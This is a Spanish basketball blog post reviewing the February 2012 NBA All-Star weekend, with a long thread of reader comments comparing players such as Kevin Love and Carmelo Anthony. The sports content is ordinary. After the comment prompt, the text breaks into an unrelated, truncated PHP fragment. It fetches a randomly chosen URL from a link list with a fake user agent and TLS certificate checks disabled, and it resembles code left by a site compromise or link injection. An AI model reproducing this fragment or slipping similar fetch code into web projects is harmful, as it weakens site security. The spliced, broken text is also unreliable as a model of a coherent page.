Informe del Fin de semana: ¿All Star?

27 de February de 2012 por txusma

Curiosamente, las estadísticas de este fin de semana demuestran que el All Star interesa incluso menos que un fin de semana normal de competición. Menos comentarios y menos visitas. ¿Aprovechasteis todos para iros de fin de semana? La verdad es que el All-Star hace tiempo que no motiva a nadie. Al menos a los que nos pasamos por aquí y nos jactamos de seguir la liga día a día.

La noche del viernes empezó con un partido de jóvenes que no sorprendió y ofreció lo que todos esperaban de él: intensidad nula y sucesión de jugadas “espectaculares” si es que algo de espectacular tiene una jugada ofensiva realizada frente una defensa inexistente. Los últimos minutos del partido, que no fueron más que un mate tras otro ante la atenta mirada de los defensores del equipo contrario, no hicieron más que aumentar el bochorno y la vergüenza ajena. Un aplauso para Greg Monroe que, cansado de tanta tontería, decidió pisparle la pelota a John Wall cuando este se encaminaba a realizar un mate más en los segundos finales. Jose Luis nos dejó su comentario del partido al día siguiente:

“La verdad es que me alegra que nadie haya estado aquí esta noche (o al menos eso parece por los comentarios) para ver el pésimo partido que se jugó. No entiendo de verdad porqué no ponen un poquito de empeño en defender y que sea un partido competido…”

El MVP se lo llevó Kyrie Irving que anotó 34 puntos con una increíble serie de 8 de 8 en triple (aunque el partido sea una pachanga esos 8 triples hay que meterlos). Ricky Rubio se lo pasó en grande y protagonizó la jugada del partido, pasando la pelota por debajo de las piernas de Demarcus Cousins en un contraataque y posteriormente sirviéndole el alley-hoop a Blake Griffin.

El sábado fue el día de los concursos. Los 3 primeros estuvieron entretenidos. El Haier Shooting Stars lo ganó el equipo de New York y lo más interesante fue comprobar como Allan Houston mantiene en perfecto estado su muñeca de seda. Por su parte, el concurso de habilidades fue para Tony Parker que realizó un par de buenas series.

El concurso de triples fue el mejor de los últimos años. La 1ª ronda fue de gran calidad, posiblemente la mejor de la historia, y gente con 14 (Anthony Morrow que homenajeó a Petrovic), 17 (Ryan Anderson) y 18 puntos (Mario Chalmers) se quedó fuera cuando otros años se podrían haber plantado en la final con esa puntuación. James Jones consiguió 22 puntos en esa primera ronda, récord de la competición. La final se la jugaron Kevin Love y Kevin Durant, dos super estrellas de la liga, que empataron en primer término. Finalmente, fue un concentrado jugador de Minnesota el que se llevó la victoria tras no bajar de 16 puntos en ninguna de las 3 series que tuvo que jugar. Sorprende que un jugador capaz de coger más de 12 rebotes por partido sea también capaz de ganar un concurso de triples. Kevin Love se está convertiendo en alguien muy grande.

Finalmente a eso de las 4h30 hora española empezó el concurso de mates. Este año no había jurado y todo quedaba a expensas de las votaciones del público, además tampoco había final: todos los jugadores realizaban 3 mates y la actuación se valoraba globalmente. Los de la NBA no deben saber nada de John Cobra o Chikilicuatre porque si lo supieran no creo que se prestasen a semejante experimento. El concurso fue flojo, para que engañarse, pero nos dejó algunos mates de mérito, todos en la 2ª ronda:

“Aceptable ronda. Aguantaremos. Bien Evans y bien George. Loncar con tanta oscuridad y sin poder enfocar bien se lo ha perdido. Williams 1r con ayuda de Ricky. Bastante bueno”. Rumbero

El concurso lo ganó Jeremy Evans, aunque la verdad es que yo lo hubiera dejado desierto. A Sancho88 tampoco le gustó el concurso:

“Si la mejor imagen que puedes ofrecer de tu liga es un concurso de mates totalmente improvisado, mal organizado, y donde los jugadores se nota que no han ensayado absolutamente nada, además de no ser idóneos para ese concurso… pues apaga y vámonos”

Fue tal la decepción que dejó el evento que en los comentarios nos pusimos a rememorar concursos pasados para matar el gusanillo. ¡Grandes Vince Carter y Jason Richardson!

Y ayer se acababa todo con un partido de las estrellas que siguió el guión previsto. Poca intensidad y muchos mates hasta los minutos finales donde se llegó con el marcador apretado y la cosa se puso interesante. Kevin Durant se llevó el MVP gracias a sus 36 puntos y a que el Oeste ganó el partido. Si el Este hubiera acabado remontando los 21 puntos de diferencia que llegó a sufrir, posiblemente el MVP se lo hubieran llevado o Lebron James (36 puntos, 6 rebotes y 7 asistencias) o Dwyane Wade (24-10-10). Kobe Bryant anotó 27 puntos y superó a Michael Jordan como el jugador que más puntos ha anotado en los All Star Game. Antes, el jugador de los Lakers había recibido un fuerte golpe en la nariz pero siguió jugando. Posteriormente se le hicieron pruebas que revelaron que se había roto la nariz. Habrá que esperar a los próximos días para comprobar si esta lesión le afecta en la competición. Marc Gasol, al que partidos como este le van todavía peor que a su hermano, jugó 14 minutos en los que anotó 4 puntos. Resumen de Cocinitas:

“Vaya fin de semana, que vuelvan los partidos ya. Bueno el último cuarto del partido no estuvo mal. MVP para Kevin Durant y triple doble de Wade. Lebron la volvio a cagar en los últimos segundos con bola para ganar el partido.”

TOP-10 del All Star Game

 

Comenta

34 comentarios a esta entrada

  1. nba dice:
    #1

    Me alegra no haber trasnochado para ver el All-Star , lo mas significativo del finde , para mi el concurso de triples y el golpe de Wade a Kobe , el karma es lo que tiene wawawawhaha … veremos a Kobe con mascara protectora ???

      Citar

  2. GreenPride dice:
    #2

    Bueno pues yo reconozco que no he visto más que dos o tres imágenes de resumen de un fin de semana del All-Star que nunca fue santo de mi devoción y ahora menos que nunca. Para mí un mero trámite sin ningún valor, si encima se lesiona uno de los jugadores (Kobe) pues apaga y vamonos ¡Que vuelva la competición de verdad ya!

      Citar

  3. Ru dice:
    #3

    Yo me bajé del burro esta noche y no me tragué el All Star de los mayores.A tenor del resultado no me arrepiento.Lo único que se puede decir del fin de semana es seguir insistiendo en que los partidos no se conviertan en pachangas y que se ponga algo de empeño en hacer buenos balances defensivos,poner un poco más de intensidad…no digo llegar al nivel de Monroe vs Cousins,que muchos hablais del “robo” Monroe a Wall -que tiene guasa,pero es la jugada del fin de semana-,pero en varias disputas por rebotes se veía mucha mala uva entre el jugador de Pistons y el de Kings,como si hubiera viejas rencillas por ahí pululando.Probablemente la única forma de cambiar eso sea la de hacer “Combinado USA vs Resto del Mundo”.Con el orgullo del pueblo americano en juego seguro que se lo toman de otra manera.

    Del resto de eventos,el Rising Star Challenge me parece buena idea,yo quiero seguir disfutando de un partido exclusivo de las nuevas futuras estrellas de la NBA,pero aquí si que sería necesario una charla con los jugadores para que se metieran más en el partido.Por cierto ver la cara de alegría de Ricky no tiene precio.Recuerdos a Xavi Pascual desde la distancia.Los concursos menores bien,el Taco Bells Skills y el Shooting Stars en su línea,y en este último siempre disfruta uno viendo exjugadores(por cierto,en el equipo de Atlanta con Stackhouse parecían dos jugadores retirados y jugadora de WNBA,Stackhouse me suena a años 90!!!).

    El de triples gran nivel,con Kevin Love sumando puntos de cara a los aficionados que poco a poco van cayendo en sus redes(ay ilusos!).Yo confiaba más en Morrow -vaya lentitud en armar el tiro- y Anderson para este evento,pero ver a Durant redimirse y a Love le hacen a uno meterse sus apuestas por el…concurso de mates…que gane Jeremy Evans con la M_ERDA de primer mate por más cámara que lleve es de vergüenza.Debía haberle supuesto la eliminación instantánea por favor.El mate que más me gustó fue el de Paul George sin luces,y era más bien pura fachada que mate en si mismo,pero ahí estuvo la idea novedosa.¿Está todo inventado?No lo sé,pero tampoco hace tanto del 2003 con J-Rich.

    En fin,que vuelva la competición que seguro nos lo pasamos mejor con los partidos y ojito,con los traspasos,que el 1 de marzo está ahí ya.

      Citar

  4. nba dice:
    #4

    Suerte que tienen en el Oeste con los dos Kevin(Durant, Love) que son de perfil bajo mediaticamente hablando y que van a dominar la liga en los proximos años, viva el baloncesto

      Citar

  5. Txusma dice:
    #5

    Definitivamente, esto del All Stars no os interesa 😀

      Citar

  6. Sancho88 dice:
    #6

    Yo con Kevin Love estoy flipando. No hace tanto que eclosionó (Mundobasket de Turquía 2010), y desde entonces no ha parado de crecer su juego y su aportación a los Wolves. Ayer no se achantó ante tantas figuras, y completó un muy digno 17-10, monopolizando los primeros minutos del último cuarto, como si todavía siguiese en el concurso de triples. Además, tiene una característica que se nace con ella o no se nace: competitividad. Es el típico jugador que no quiere perder ni a las canicas, y la llegada de Ricky le ha aumentado ese ansia viva. Irá a los juegos olímpicos, y para mí, ahora mismo es el mejor poste de USA. No creo que España pueda pararle. Así como tenemos recursos para parar a Bynum, Howard, e incluso a Bosh, a este señor creo que no. Para mí, en la liga solo había un ala-pívot al nivel de Gasol por resistencia física y calidad (si excluímos a Garnett y Duncan, que físicamente están en la últimas, aunque son todavía muy buenos), y ese era Nowitzki. Pero Love me ha descuadrado mi orden de ala-pívots. Creo que es mejor que Pau, creo que también supera a Nowitzki, aunque a este lo supera por su declive físico, y en 3-4 años, cuando estos jugadores ya no estén, solo veo a Aldridge plantándole cara en los quintetos del año. Es una barbaridad de jugador, ya está marcando época, y me parece un jugador ideal para completar un equipo con aspiraciones al anillo. Creo que no se hizo justicia con su renovación, que merecía algo más, y, por supuesto, aún le falta su contrato gordo. No sé si lo obtendrá en Lakers, donde yo creo que tiene su futuro, al ser californiano además, pero está claro que en 5 años este hombre estará cobrando sus 20 millones seguro.

      Citar

  7. nba dice:
    #7

    Yo creo que Love llegado el momento tendrá que decidir , si prefiere ganar mas pasta o tener un equipo con aspiraciones al anillo.
    Yo creo que la renovacion en los Wolves la hicieron con la idea de no hipotecarse y tener la posibilidad de todos los años tener un equipo competitivo , y que no este limitado por el sueldo de una superestrella

      Citar

  8. Nacho dice:
    #8

    Considerándolo un jugadorazo, que lo es, creo que le falta un no sé qué, que, obviamnete, no sé qué es.
    Probablemente lo que le pasaba a Pau en Memphis, que todos decíamos que sí, pero que faltaba algo, y fue llegar a L.A. para ver que lo tenía. Es probable que eclosione finalmente y pueda ser como el alemán si se queda en Mineápolis. Además creo que están haciendo bien las cosas allí y podrían montar un equipo de aspiraciones serias en un par de años. Y yo, a diferencia de Sancho, no lo veo mejor que Pau. El catalán tiene una sobriedad que me enamora en un deportista, y que le da una calidad fuera de lo común. Si fuera un tipo de números Pau tendría mucho mejores estadísticas, hubiera hecho temporadas de 20-10 y más con la gorra, pero no sería mejor jugador. Lo bueno de Love es que es joven, mejora, porque además le mola, y creo que está en el equipo adecuado, y con el entrenador adecuado. ¡Qué daño le haría a este tío un McMillan de la vida, o un Xavi Pascual! (de este tipo peor que el afamado coach tjnba)
    Con la tontería que acabo de poner, se me ocurre que podríamos hacer la franquicia TJNBA, con la peña a la que más cera se da por estas páginas. Así a bote pronto se me ocurre:
    GM: Kupchack
    Coach: McMillan
    Guards: Fisher/Nelson (¿Quién sería el titular?)
    SG: Joe Johnson…
    lo dejo aquí para que lo completéis.

    Un abrazo y no se vayan todavía, mañana hay más. (Después de este fin de semana te dan ganas de borrarte de la NBA)

      Citar

  9. Denise dice:
    #9

    Joder, tambien le pegais palos a Xavi Pascual?? Pero si lo ha ganado casi todo…
    No sé, si se llamase Xavi Pascualovic quizas os molaba más,me recuerda al futbol, donde se pagan millonadas por tipejos que acaban en -inho o se hacen crestas, mientras el talento lo tienen en casa.

      Citar

  10. Nacho dice:
    #10

    No le doy palos, ME ABURRE. Peor es Ivanovic, pero como ahora no está de moda, pues de esa se libra. Para ejemplo, soy casi del Barça en basket, pero estos años me ha aburrido tanto que me moló que el madrid le mojara la oreja, porque entre otras cosas me lo paso mejor viéndolos. Pregúntale si no a Ricky por él.

      Citar

  11. Denise dice:
    #11

    Nacho:
    . ¡Qué daño le haría a este tío un McMillan de la vida, o un Xavi Pascual! (de este tipo peor que el afamado coach tjnba)
    Con la tontería que acabo de poner, se me ocurre que podríamos hacer la franquicia TJNBA, con la peña a la que más cera se da por estas páginas. Así a bote pronto se me ocurre:
    GM: Kupchack
    Coach: McMillan
    Guards: Fisher/Nelson (¿Quién sería el titular?)
    SG: Joe Johnson…
    lo dejo aquí para que lo completéis.

    El quinteto de maltratados por TJNBA sería:
    – Jameer Nelson (incomprensible, pero en fin vosotros vereis….ya callará bocas)
    – Joe Johnson (la culpa no la tiene él, sino el que le firmó el contrato)
    – Melo Anthony (bluff sobrevalorado, no sería mal jugador como tercer estrella en un equipo)
    – Amare Stoudemire (no es nadie sin Don Steve Nash a su lado)
    – Andrea Bargnani (simplemente por ser un picha fría)

    Como sexto hombre pues tendríamos a Derek Fisher o a Michael Beasley

      Citar

  12. Blade Petrovic dice:
    #12

    Denise: El quinteto de maltratados por TJNBA sería:
    – Jameer Nelson (incomprensible, pero en fin vosotros vereis….ya callará bocas)
    – Joe Johnson (la culpa no la tiene él, sino el que le firmó el contrato)
    – Melo Anthony (bluff sobrevalorado, no sería mal jugador como tercer estrella en un equipo)
    – Amare Stoudemire (no es nadie sin Don Steve Nash a su lado)
    – Andrea Bargnani (simplemente por ser un picha fría)

    Añadiria al Gran Luke Walton
    El año pasado me levanté y me vi el All-Star entero y me paeció una pachanga asi que o mejoran el nivel sobretodo de los mates.Que no me metan a un tío que lleva 6 mates en toda la temporada tendrian que hacer: Lebron, Kobe Howard i Iguodala por ejemplo

    Como sexto hombre pues tendríamos a Derek Fisher o a Michael Beasley

      Citar

  13. Vader dice:
    #13

    @Denise

    Sobre Stat, el año pasado con Felton era candidato al mvp… Melo tercera espada? Por favor… vuestra tirria a todo lo que huele a Knicks es proverbial…

      Citar

  14. simon dice:
    #14

    Hombre tercera espada no, pero primera ha quedado claro que tampoco…

      Citar

  15. Vader dice:
    #15

    simon:
    Hombre tercera espada no, pero primera ha quedado claro que tampoco…

    ¿A quedado claro? De momento ha ganado los mismos anillos que Lebron James… Vamos yo es que alucino… Vamos a esperar a como acaba por lo menos esta temporada no? El año pasado los Knicks no tenian equipo para hacer nada, este año estamos a mitad de curso y ya estais seguros que Melo no sirve como jugador franquicia. ¿Pues si Melo no es jugador franquicia los equipos que no tengan a Howard, Durant, Bryant o Lebron no pueden ganar seguro?

    Yo no digo que los Knicks vayan a ganar el anillo y que Melo sea MVP pero un poco de prudencia por favor…

      Citar

  16. Denise dice:
    #16

    Vader: ¿A quedado claro? De momento ha ganado los mismos anillos que Lebron James… Vamos yo es que alucino… Vamos a esperar a como acaba por lo menos esta temporada no? El año pasado los Knicks no tenian equipo para hacer nada, este año estamos a mitad de curso y ya estais seguros que Melo no sirve como jugador franquicia. ¿Pues si Melo no es jugador franquicia los equipos que no tengan a Howard, Durant, Bryant o Lebron no pueden ganar seguro?

    Yo no digo que los Knicks vayan a ganar el anillo y que Melo sea MVP pero un poco de prudencia por favor…

    Para mi lo peor de Melo no es lo que está haciendo en los Knicks, sino lo que no pudo ser capaz de hacer en Denver con el equipazo que le montaron a su alrededor.

    Y para mi, Melo como tercer integrante de un Big 3, no está mal. Para jugador franquicia en un equipo que aspire a anillo no sirve al nivel. Por supuesto que podrá meter 25 puntos por noche, pero para mí, meter 25 por noche no es sinonimo de buen jugador.
    Y ojo, que si los Knicks ganan el anillo (no lo creo, pero es una suposición) no sería ya por Melo en sí, sino por encontrarse de la nada a Lin y el fichaje de JR Smith que le ha proporcionado una plantilla bastante profunda.

      Citar

  17. Cocinitas dice:
    #17

    No nos olvidemos de la bestia reboteadora Brook Lopez

      Citar

  18. nba dice:
    #18

    De aqui a final de periodo de traspasos me parece que vamos a tener al culebron de Pau, yo con tal de que no acabe en Toronto, cualquier otro destino me pareceria aceptable , incluso los bobcats

      Citar

  19. MagicJohnson32 dice:
    #19

    No dejéis de escuchar el especial All Star de Vuelo #23: http://iradio.ucam.edu/vuelo-23-especial-all-star-con-ettore-messina/6256/

      Citar

  20. simon dice:
    #20

    Vader: ¿A quedado claro? De momento ha ganado los mismos anillos que Lebron James… Vamos yo es que alucino… Vamos a esperar a como acaba por lo menos esta temporada no? El año pasado los Knicks no tenian equipo para hacer nada, este año estamos a mitad de curso y ya estais seguros que Melo no sirve como jugador franquicia. ¿Pues si Melo no es jugador franquicia los equipos que no tengan a Howard, Durant, Bryant o Lebron no pueden ganar seguro?

    Yo no digo que los Knicks vayan a ganar el anillo y que Melo sea MVP pero un poco de prudencia por favor…

    Venga claro, y ha ganado los mismos MVP que James?? y los mismos ROY?? ha estado las mismas veces en el quinteto de la NBA?? ha jugado las mismas finales de James?? ha llevado a su equipo a pasar cuantas verces la primera ronda de PO?? una vez en 7 ocasiones?? eso si aquellos PO en los que llegaron a la final de conferencia estuvo maravilloso ( tengo que reconocerlo ) jejeje pero tuvo buenos equipos casi desde que llegó, ( lebron tenia un solar ) Anthony es una estrella de la NBA pero no es comparable a James.
    James le falta dar el ultimo paso para demostrar que es un grande entre los grandes.
    Anthony le falta dar un par de pasos para demostrar que es un grande y no te digo ya para demostrar que es un grande entre los grandes. y mientras no lo demuestre es una simple estrella como lo pueden ser 15 o 20 en la NBA.

      Citar

  21. melo15 dice:
    #21

    Simon el RoY se lo merecia Carmelo, eso esta clarisimo, fue una injusticia, Carmelo ha ganada un march madness, todos estos años ha jugado en el salvaje oeste, o esto solo cuenta cuando hablamos de Garnett, y de gente que os cae bien, tercera espada??? Un Top-3 en su posicion tercera espada, y Joe Johnson y Danny Granger jugadores de rol??
    Melo es peor que Lebron, pero es que no hay nadie como Lebron, en todo el MUNDO.

      Citar

  22. Vader dice:
    #22

    melo15:
    Simon el RoY se lo merecia Carmelo, eso esta clarisimo, fue una injusticia, Carmelo ha ganada un march madness, todos estos años ha jugado en el salvaje oeste, o esto solo cuenta cuando hablamos de Garnett, y de gente que os cae bien, tercera espada??? Un Top-3 en su posicion tercera espada, y Joe Johnson y Danny Granger jugadores de rol??
    Melo es peor que Lebron, pero es que no hay nadie como Lebron, en todo el MUNDO.

    Se puede decir más alto pero no más claro…

      Citar

  23. simon dice:
    #23

    Melo si me lees bien yo nunca he dicho k sea un 3 espada, he dicho que no es un primer espada para un equipo CONTENDER, y lo de James lo decia en plan exagerado pq ya empezaba Vader a decir lo de los anillos de James vs los de Anthony como si eso valiera para hacer una comparación entre los logros de dichos jugadores, y no es asi pq si te pones a comparar anillos entonces: Ricky Rubio 0 anillos vs Stockton 0 anillos… quien es mejor? eso no va asi como ha querido decir Vader.
    Y lo del ROY bueno… quizá si hubiera sido compartido no hubiera pasado nada y quizá hubiera sido mas justo, pero de ahi a decir que fue una injusticia… para mi lo mas justo hubiera sido compartido tambien hubiera sido injusto para Lebron que se lo hubieran dado a Anthony.

      Citar

  24. melo15 dice:
    #24

    Eso no es verdad, fue una INJUSTICIA, y me baso es que en un articulo para decidir, quien se merecia el ROY entre HORFORD Y DURANT, en este blog, se dijo, que se lo merecia horford, porque a pesar de sus estadisticas su equipo habia ido a playoffs, pues enyonces yo me pregunto, Melo 20-6 rebotes, que son unos pedazo numeros y su equipo a playoffs y Lebron 20-5-5 que son mejores que las de Melo pero no tanto, y este se lleva el premio.
    PORQUE?

      Citar

  25. melo15 dice:
    #25

    Eso no es verdad, fue una INJUSTICIA, y me baso es que en un articulo para decidir, quien se merecia el ROY entre HORFORD Y DURANT, en este blog, se dijo, que se lo merecia horford, porque a pesar de sus estadisticas su equipo habia ido a playoffs, pues enyonces yo me pregunto, Melo 20-6 rebotes, que son unos pedazo numeros y su equipo a playoffs y Lebron 20-5-5 que son mejores que las de Melo pero no tanto, y este se lleva el premio.
    PORQUE?
    Sobre el tema de los anillos, tiene razon Simon. (Ya lo he reconocido)

      Citar

  26. simon dice:
    #26

    Bueno Melo visto desde esa perspectiva quizá lleves razón en lo del ROY no conocia los numeros de uno y otro y hablaba de memorieta. pero no se viendo los numeros de cada uno lo mejor hubiera sido un ROY compartido no?
    quiero decir también hubiera sido un poco injusto que Lebron no se hubiera llevado el ROY pues las temporadas son muy parecidas en cuanto a rendimiento, quizás por el balance de sus equipos se lo hubiera tenido que llevar Anthony, quizá si. Para mi el ROY es un premio en el que el rendimiento del equipo es “secundario”, quiero decir da igual si lo metes en PO en tu primer año o no, lo importante es que se vea en ti que en unos años vas a ser capaz de meterlo año si año también en PO y que el récord haya mejorado respecto al año pasado pero PO o no PO creo que es un poco indiferente.

      Citar

  27. Sancho88 dice:
    #27

    Con esa intención se lo dieorn a Tyreke, porque sabían que en dos-tres años iba a hacer ganar a su equipo y a meterlos en playoffs, xd

      Citar

  28. Blade Petrovic dice:
    #28

    Melo Lebron era más joven y menos maduro pero cuando maduró a unos paquetorrios comoHughes,Iglauskas,Gibson,Marshall,Brown… llego a las Finales Y melo como te dije una vez carmelo con Iverson 5 anotador, melo el 3, Camby defesive player,Martin un buen jugador de rol y un banquillo con Nené y algunos bastante mejores que el de los cavs que de los mejores ers Eric Snow, denver quedó 8 en el oeste y primera ronda de playoffs.

      Citar

  29. simon dice:
    #29

    Sancho88:
    Con esa intención se lo dieorn a Tyreke, porque sabían que en dos-tres años iba a hacer ganar a su equipo y a meterlos en playoffs, xd

    Tyreke es que cada año es peor por mucho que me duela pues los kings es uno de mis equipos predilectos, no se si es por las lesiones, por la falta de confianza o porqué ( el hecho de jugar de base no me vale pues en su año Rookie ya la hacia ) aparte que este no tuvo gran competancia ese año, un poquito de Curry y el inicio de Jennings fueron los unicos que lo discutieron un poquito.

      Citar

  30. Sancho88 dice:
    #30

    Bueno, es peor por su tiro, pero sabe hacer muchas cosas eh? Yo tengo claro que si mejorase el tiro, sería un 20-5-5 todas las temporadas. Y creo que eso no sería ser mal jugador… Mira, mi teoría sobre él es: ya era mal tirador, pero la primera temporada estaba enchufadísimo+aspirar al roy+su equipo era una mierad y no estaba Thornton para tirarse sus tiros = 20-5-5. Luego, en la segunda temporada se lesionó, llegó Thornton, y está claro que en el verano entre el Roy y su año sophomore, no hizo nada con respecto al tiro. Y este verano, estoy convencido de que lo dedicó a descansar. No sé si fue HisRoyalAirness que comentó por aquí lo de la fascitis plantar, que con descanso se curaba. Pues yo creo que él ahora físicamente ya no arrastra esos problemas, o al menos esta temporada ha jugado todos los partidos, aparentemente sin ningún problema, pero si realmente quiere mejorar y ser un combo guard de los mejores de la liga, tiene que afinar desde el triple y plantarse en un 35% de efectividad, además de mejorar la selección de tiro a media distancia, y ser más inteligente en sus entradas suicidas a canasta. Sé que parecen muchos requisitos, pero no te creas. El tío es muy rápido, si le ponen de escolta supera a muchísimos tanto por físico como por rapidez, sabe dar pases y coger rebotes, además de roba balones, tiene un gran salto vertical, machaca… no sé, su principal tara es el tiro. Si lo mejora, para mí que sería un jugador muy respetable en la liga. Qué opinais?

      Citar

  31. simon dice:
    #31

    Sancho88:
    Bueno, es peor por su tiro, pero sabe hacer muchas cosas eh? Yo tengo claro que si mejorase el tiro, sería un 20-5-5 todas las temporadas. Y creo que eso no sería ser mal jugador… Mira, mi teoría sobre él es: ya era mal tirador, pero la primera temporada estaba enchufadísimo+aspirar al roy+su equipo era una mierad y no estaba Thornton para tirarse sus tiros = 20-5-5. Luego, en la segunda temporada se lesionó, llegó Thornton, y está claro que en el verano entre el Roy y su año sophomore, no hizo nada con respecto al tiro. Y este verano, estoy convencido de que lo dedicó a descansar. No sé si fue HisRoyalAirness que comentó por aquí lo de la fascitis plantar, que con descanso se curaba. Pues yo creo que él ahora físicamente ya no arrastra esos problemas, o al menos esta temporada ha jugado todos los partidos, aparentemente sin ningún problema, pero si realmente quiere mejorar y ser un combo guard de los mejores de la liga, tiene que afinar desde el triple y plantarse en un 35% de efectividad, además de mejorar la selección de tiro a media distancia, y ser más inteligente en sus entradas suicidas a canasta. Sé que parecen muchos requisitos, pero no te creas. El tío es muy rápido, si le ponen de escolta supera a muchísimos tanto por físico como por rapidez, sabe dar pases y coger rebotes, además de roba balones, tiene un gran salto vertical, machaca… no sé, su principal tara es el tiro. Si lo mejora, para mí que sería un jugador muy respetable en la liga. Qué opinais?

    de acuerdo en casi todo, pero creo que incluso en la toma de decisiiones ha empeorado, aunque eso también puede venir de su falta de confianza que le haga ser mas indeciso y eso lleva tomas de decision erroneas.

      Citar

  32. Sancho88 dice:
    #32

    Hostia nene, qué bueno es Greg Monroe. No me había fijado mucho en él hasta hoy, pero este señor es buenísimo. No diré que tiene potencial para ser el mejor pívot de la liga, porque potencial ya no se puede decir en esta página, jeje, pero que crack!!

      Citar

  33. simon dice:
    #33

    No lo habias visto hasta hoy??? es un jugadorazon y en un equipo decente podría ser mucho mejor pues no es un jugador que necesite muchos tiros para hacer sus puntos y es uno de los mejores pasadores dentro de los pivots probablemente un top-5 sino más… y eso en un equipo mejor podría explotarlo mejor que en una banda como son los pistons

      Citar

  34. Sancho88 dice:
    #34

    López 38-6… irremediablemenet el MVP de la jornada, cargándose a los Mavs, jejejej. Grande. Y Webster en dobles figuras, con 11 puntos. Yo creo que ayer le levantó el castigo la parienta…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>